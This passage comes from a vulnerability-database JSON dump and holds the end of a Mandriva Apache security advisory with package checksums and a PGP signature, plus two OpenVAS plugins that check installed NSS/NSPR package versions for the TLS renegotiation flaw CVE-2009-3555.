2010.0/x86_64/apache-mpm-event-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e7a9752d15eba26d1ac072b2e25ee559 2010.0/x86_64/apache-mpm-itk-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n f6a733d163fc33345c5bd2e2104f4337 2010.0/x86_64/apache-mpm-peruser-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ccdcfa4fa39683a78a43f0115cb5e299 2010.0/x86_64/apache-mpm-prefork-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d94ec40a8272788ae9636c444f354c65 2010.0/x86_64/apache-mpm-worker-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 714f9b5de7bcc482988ceac41d186236 2010.0/x86_64/apache-source-2.2.14-1.1mdv2010.0.x86_64.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 445117a109396af9413dca2a69f01a0a corporate/3.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 corporate/3.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 corporate/3.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 corporate/3.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a corporate/3.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 corporate/3.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc \r\ncorporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 \r\ncorporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff \r\ncorporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 corporate/3.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 corporate/3.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f corporate/3.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 8ed8407694197319443b1dc1400d41c6 corporate/3.0/x86_64/apache2-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 6a1163108c43c55a8a55619493d641a0 corporate/3.0/x86_64/apache2-common-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 58151e6d42ced2607936d1b1c213dd32 corporate/3.0/x86_64/apache2-devel-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 99a3c31922d94d203af88a2563d13084 corporate/3.0/x86_64/apache2-manual-2.0.48-6.24.C30mdk.x86_64.rpm\r\n b08953bf8a87cbee0241d847e6cbb6a6 \r\ncorporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1a5ad78b7315a7a6bfa05db7438c6eda corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a636014239d93572e2a91ee866ae3f82 \r\ncorporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 9adcf4378314a767e696654b3331b457 \r\ncorporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 49ef3af0b106e5eec7fe3005fb81b5d4 \r\ncorporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 958dffea2073203c81f20b9f0bea9482 \r\ncorporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a9e65314e2fd6e892509e0da10f6eeb0 \r\ncorporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1868d43b584b33eecf05d34e9cf3fb4c \r\ncorporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 5be056de8b78c46a8c92215dbd5f227e corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.24.C30mdk.x86_64.rpm\r\n e7afdce1e4b9e73f8798a7ac1651b896 corporate/3.0/x86_64/apache2-modules-2.0.48-6.24.C30mdk.x86_64.rpm\r\n af0468764dd4b41a504a767bc83cb6e0 corporate/3.0/x86_64/apache2-source-2.0.48-6.24.C30mdk.x86_64.rpm\r\n ca4b564d5e3bf167a6aa1f9ed2b4d87a corporate/3.0/x86_64/lib64apr0-2.0.48-6.24.C30mdk.x86_64.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n d07e89c7290315f70eac762e5b18c87a corporate/4.0/i586/apache-base-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 024922fdd74e02987c974574bee16142 corporate/4.0/i586/apache-devel-2.2.3-1.9.20060mlcs4.i586.rpm\r\n a6f56a8099acac3eed1a5795b319894b \r\ncorporate/4.0/i586/apache-htcacheclean-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 04013648d7252ff8280b8a0bd0bc54d8 \r\ncorporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n bbe1270f753acfcadd609f0f5271ab59 corporate/4.0/i586/apache-mod_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 8e39e175d01ba601cc8f4a89aa0aafe8 corporate/4.0/i586/apache-mod_dav-2.2.3-1.9.20060mlcs4.i586.rpm\r\n c624f40ca8a6e17396aa6c8b0e87316a corporate/4.0/i586/apache-mod_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 48507ca50019f15557211e7208917442 \r\ncorporate/4.0/i586/apache-mod_deflate-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 0c35cb63bff80d6a374dc1bb638c293d \r\ncorporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e54a0df2e42964146494087a713c88d7 \r\ncorporate/4.0/i586/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 6671114f02a3f484499ea8c374e8490a corporate/4.0/i586/apache-mod_ldap-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 9a9c1bea5eec317c217d696d72569e6e \r\ncorporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 23f6363a3bf7833d2b96a3297e4a564f corporate/4.0/i586/apache-mod_proxy-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 3b9415f481e7a22a5198028ae959a5dd \r\ncorporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 86554d7f517fce317019f67fd75259ad corporate/4.0/i586/apache-mod_ssl-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e3e5dc6310d7bf1d4d2044b1725a9d48 corporate/4.0/i586/apache-modules-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 2fd54535f742c7717965f9724d2d01f0 \r\ncorporate/4.0/i586/apache-mod_userdir-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 632c40b46876d9b703ad23eced906f78 \r\ncorporate/4.0/i586/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e30e11806815fb176b3c803c5019f177 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.9.20060mlcs4.i586.rpm\r\n b5a512cf0d830276bee061adc68865c6 corporate/4.0/i586/apache-source-2.2.3-1.9.20060mlcs4.i586.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ecc2a3bd8e40259f3abe8b919be7c19e corporate/4.0/x86_64/apache-base-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 15fbe828c013d9e6f057429316e52b4f corporate/4.0/x86_64/apache-devel-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 35200d719d37cce3340a3340ed8844f0 \r\ncorporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 9557096c0aaa1654b01a702aaec9cfdc \r\ncorporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 360db7ff5aeb5fb4d50965ff46cf33c2 \r\ncorporate/4.0/x86_64/apache-mod_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n fc3466f85615fe8c101c378cf708925e \r\ncorporate/4.0/x86_64/apache-mod_dav-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 36c78f40285a12e4435cdc3f50760e98 \r\ncorporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n af76befa20d16f23e2ca3cdb058a6556 \r\ncorporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 1c150757dbf06246e7410267e56bc874 \r\ncorporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3a4209a8308aeeddbf85013373e24fe8 \r\ncorporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bf2d893217e5394b69d6cedb35ba9fcd \r\ncorporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bab8c9e7147958bda7d19884a1f79828 \r\ncorporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n b8b59cf82195b1525939ae6b2c8d6f74 \r\ncorporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 982465827884b85213e668abc230f614 \r\ncorporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d9a259ad81f55eabf8a41444f65a5e88 \r\ncorporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3745511966963a96653d60c083e20557 \r\ncorporate/4.0/x86_64/apache-modules-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n f715e52fc3c12cc00bdce10f7d51b393 \r\ncorporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n e475591ac7db24d778cea1aa9aac4273 \r\ncorporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3033b599c0c128f6db7d86563f4ae8a8 \r\ncorporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d80783acdafdac78524ce398c49d9109 \r\ncorporate/4.0/x86_64/apache-source-2.2.3-1.9.20060mlcs4.x86_64.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 5cbfefa0f9325fa6f9ef005f07a6b8b8 mes5/i586/apache-base-2.2.9-12.5mdvmes5.i586.rpm\r\n 88d57fd2e10472f88f140ff8d55dbc38 mes5/i586/apache-devel-2.2.9-12.5mdvmes5.i586.rpm\r\n aa0a36e0aced2ca4547b2bc110b6ef4d mes5/i586/apache-htcacheclean-2.2.9-12.5mdvmes5.i586.rpm\r\n ab53720093285644b4ac28acf4da4691 mes5/i586/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n 3f77dbc75bdd7ee21f29b441c6e521ed mes5/i586/apache-mod_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n a4bf3ff6e987fe3343af8434757a88a7 mes5/i586/apache-mod_dav-2.2.9-12.5mdvmes5.i586.rpm\r\n 05ff14c67e71e4b64afa718ac6ba3546 mes5/i586/apache-mod_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n da8d3fe9b8273ac43b6bfc1f34863fde mes5/i586/apache-mod_deflate-2.2.9-12.5mdvmes5.i586.rpm\r\n 97244389ee38b5de47643effc489204a mes5/i586/apache-mod_disk_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n d5978571771f84149dffc6190a3e8ea3 mes5/i586/apache-mod_file_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 463698779bc7b8bbfdb06160ee8338c0 mes5/i586/apache-mod_ldap-2.2.9-12.5mdvmes5.i586.rpm\r\n 75e208ff4c965cb9562d71b0c3f3b54b mes5/i586/apache-mod_mem_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 258387abdac4af540702af7a3ddc369f mes5/i586/apache-mod_proxy-2.2.9-12.5mdvmes5.i586.rpm\r\n d34347687b1487625db8f33ac1c9bf0a mes5/i586/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.i586.rpm\r\n 250b156963ece2dc2f9fdac651f6a395 mes5/i586/apache-mod_ssl-2.2.9-12.5mdvmes5.i586.rpm\r\n d21faefa501bb2e5f5858476e02c1226 mes5/i586/apache-modules-2.2.9-12.5mdvmes5.i586.rpm\r\n 0f28dbb179b145765fe5ed88ceb8ec74 mes5/i586/apache-mod_userdir-2.2.9-12.5mdvmes5.i586.rpm\r\n bfa565b70c216c8768a2feb891cc2603 mes5/i586/apache-mpm-event-2.2.9-12.5mdvmes5.i586.rpm\r\n 5a283fab88631fddb90ed198a0e013f7 mes5/i586/apache-mpm-itk-2.2.9-12.5mdvmes5.i586.rpm\r\n d1f025db329f45b590decda1dd39f139 mes5/i586/apache-mpm-peruser-2.2.9-12.5mdvmes5.i586.rpm\r\n 831118fd77a0867e1648bf7b81d3dc21 mes5/i586/apache-mpm-prefork-2.2.9-12.5mdvmes5.i586.rpm\r\n 2e40c5744eca10bcee1994265bfa0add mes5/i586/apache-mpm-worker-2.2.9-12.5mdvmes5.i586.rpm\r\n 384f3506ca34228b8608333366c06567 mes5/i586/apache-source-2.2.9-12.5mdvmes5.i586.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 042689e5830432c43d311f5852c8a6b9 mes5/x86_64/apache-base-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e8ef5d5e9b50211446abb3bdce89490e mes5/x86_64/apache-devel-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 1feb03240bdd0062a74e144019e65627 mes5/x86_64/apache-htcacheclean-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 53490db1804ebfe8f37e0c5583ff199f mes5/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 57e1c45e2bd8e9c9cd2863a4a75a655f mes5/x86_64/apache-mod_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 896de3fbd0e0e39f97c46f9b97689076 mes5/x86_64/apache-mod_dav-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c3753326915c49a65d6b2dfe591bc417 mes5/x86_64/apache-mod_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8213cf826f9b91a97d7ff9211c66580a mes5/x86_64/apache-mod_deflate-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 01ba45d05dc6c0760b39f1292c44a898 mes5/x86_64/apache-mod_disk_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8d1b82025dce6cd6e58d64fb55f5f924 mes5/x86_64/apache-mod_file_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d7b2408e8084272e00b42ac6239c8093 mes5/x86_64/apache-mod_ldap-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c062d0ff490d24df2de15d863a13d471 mes5/x86_64/apache-mod_mem_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 38ef66a65a44187ca6a07bb02f96a8c0 mes5/x86_64/apache-mod_proxy-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 408e4b205660e653dfc352ef2ec1fcab mes5/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65f377cb8cf3d4179f94ff11b274f857 mes5/x86_64/apache-mod_ssl-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 97bd5c4da3618a8732ae533fa7486f5e mes5/x86_64/apache-modules-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 5ddfd8c440d9e9276eb3ce6fb1e06bcb mes5/x86_64/apache-mod_userdir-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e91ef205af8b8aaca58b941f11a38d04 mes5/x86_64/apache-mpm-event-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d565fc890d268b77fe4de543bf00be40 mes5/x86_64/apache-mpm-itk-2.2.9-12.5mdvmes5.x86_64.rpm\r\n ba4ff5181db66fd6759a4a0d43e2e4dd mes5/x86_64/apache-mpm-peruser-2.2.9-12.5mdvmes5.x86_64.rpm\r\n a9b109a311a1750adafefe3fa20ed68e mes5/x86_64/apache-mpm-prefork-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 2860b00556bc4c55a240ceb4f69043fb mes5/x86_64/apache-mpm-worker-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65fc889e99eb01a8c7abb77258ef078f mes5/x86_64/apache-source-2.2.9-12.5mdvmes5.x86_64.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 445117a109396af9413dca2a69f01a0a mnf/2.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 mnf/2.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 mnf/2.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 mnf/2.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a mnf/2.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 mnf/2.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 mnf/2.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 mnf/2.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f mnf/2.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 mnf/2.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFK9wgKmqjQ0CJFipgRAuxlAJ9Nb9gIPz9aFR19dx/k7386s7uQCQCg8k3E\r\nHCb1+1oDp434m6raw3FK1hw=\r\n=9V9Z\r\n-----END PGP SIGNATURE-----", "modified": "2009-11-09T00:00:00", "published": "2009-11-09T00:00:00", "id": "SECURITYVULNS:DOC:22763", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22763", "title": "[ MDVSA-2009:295 ] apache", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-15T11:58:20", "bulletinFamily": "scanner", "description": "Check for the Version of nspr", "modified": "2017-12-15T00:00:00", "published": "2010-03-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880382", "id": "OPENVAS:880382", "title": "CentOS Update for nspr CESA-2010:0165 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for nspr CESA-2010:0165 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n \n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n \n Refer to the following Knowledgebase article for additional details about\n this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n \n Users of Red Hat Certificate System 7.3 and 8.0 should review the following\n Knowledgebase article before installing this update:\n http://kbase.redhat.com/faq/docs/DOC-28439\n \n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\";\n\ntag_affected = \"nspr on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-March/016607.html\");\n script_id(880382);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0165\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"CentOS Update for nspr CESA-2010:0165 centos4 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nspr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.1.el4_8\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.1.el4_8\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el4_8\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el4_8\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el4_8\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-14T11:48:58", "bulletinFamily": "scanner", "description": "Check for the Version of nss", "modified": "2017-12-14T00:00:00", "published": "2010-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830970", "id": "OPENVAS:830970", "title": "Mandriva Update for nss MDVSA-2010:069 (nss)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for nss MDVSA-2010:069 (nss)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in nss:\n\n The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\n used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl\n in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\n GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\n 3.12.4 and earlier, and other products, does not properly associate\n renegotiation handshakes with an existing connection, which allows\n man-in-the-middle attackers to insert data into HTTPS sessions,\n and possibly other types of sessions protected by TLS or SSL, by\n sending an unauthenticated request that is processed retroactively\n by a server in a post-renegotiation context, related to a plaintext\n injection attack, aka the Project Mogul issue (CVE-2009-3555).\n \n Additionally the NSPR package has been upgraded to 4.8.4 that brings\n numerous upstream fixes.\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\n \n This update provides the latest versions of NSS and NSPR libraries\n and for which NSS is not vulnerable to this attack.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"nss on Mandriva Linux 2008.0,\n Mandriva Linux 